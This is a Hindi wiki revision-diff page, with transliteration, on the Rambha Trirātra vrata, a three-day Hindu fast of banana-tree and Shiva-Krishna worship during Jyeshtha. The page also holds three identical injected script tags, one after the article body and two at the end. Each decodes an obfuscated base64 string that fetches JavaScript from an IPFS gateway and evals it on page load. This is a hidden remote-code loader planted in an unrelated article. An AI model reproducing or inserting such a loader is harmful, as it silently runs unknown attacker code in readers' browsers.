Difference between revisions of "रम्भात्रिरात्र व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*यह व्रत [[ज्येष्ठ]] [[शुक्ल पक्ष]] की [[तृतीया]] पर आरम्भ करना चाहिए।   
 
*यह व्रत [[ज्येष्ठ]] [[शुक्ल पक्ष]] की [[तृतीया]] पर आरम्भ करना चाहिए।   
 
*इस व्रत को तीन दिनों तक करना चाहिए।  
 
*इस व्रत को तीन दिनों तक करना चाहिए।  
Line 8: Line 8:
 
*[[उमा]] एवं [[शिव]], [[रुक्मिणी]] एवं [[कृष्ण]] की पूजा करनी चाहिए।  
 
*[[उमा]] एवं [[शिव]], [[रुक्मिणी]] एवं [[कृष्ण]] की पूजा करनी चाहिए।  
 
*तीन दिनों तक क्रम से त्रियोदशी, चतुर्दशी एवं पूर्णिमा को आहूतियों से होम देना चाहिए।  
 
*तीन दिनों तक क्रम से त्रियोदशी, चतुर्दशी एवं पूर्णिमा को आहूतियों से होम देना चाहिए।  
*इस व्रत के करने से पुत्रों की, सौन्दर्य की एवं सघवात्व की प्राप्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 2, 283-288, [[स्कन्दपुराण]] से उद्धरण), वर्षक्रियाकौमुदी (11),</ref>   
+
*इस व्रत के करने से पुत्रों की, सौन्दर्य की एवं सघवात्व की प्राप्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 2, 283-288, [[स्कन्द पुराण]] से उद्धरण), वर्षक्रियाकौमुदी (11),</ref>   
 
 
 
 
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 10:01, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat jyeshth shukl paksh ki tritiya par arambh karana chahie.
  • is vrat ko tin dinoan tak karana chahie.
  • sarvapratham snan ke uparant nari ko kele ki j d mean paryapt jal dalana chahie, use dhagoan se baandhana chahie, us kele ki rajat pratima tatha usake phal sone ke hone chahie, phir usaki pooja karani chahie.
  • tritiya ko nakt, chaturdashi ko ayachit tatha poornima ko upavas karana chahie.
  • kele ke vriksh ko varsh bhar jal dena chahie.
  • 'rambha' ka arth kadali (kela) bhi hai, at: yah nam hai.
  • uma evan shiv, rukmini evan krishna ki pooja karani chahie.
  • tin dinoan tak kram se triyodashi, chaturdashi evan poornima ko ahootiyoan se hom dena chahie.
  • is vrat ke karane se putroan ki, saundary ki evan saghavatv ki prapti hoti hai.[1]

  <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vratakhand 2, 283-288, skand puran se uddharan), varshakriyakaumudi (11),

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>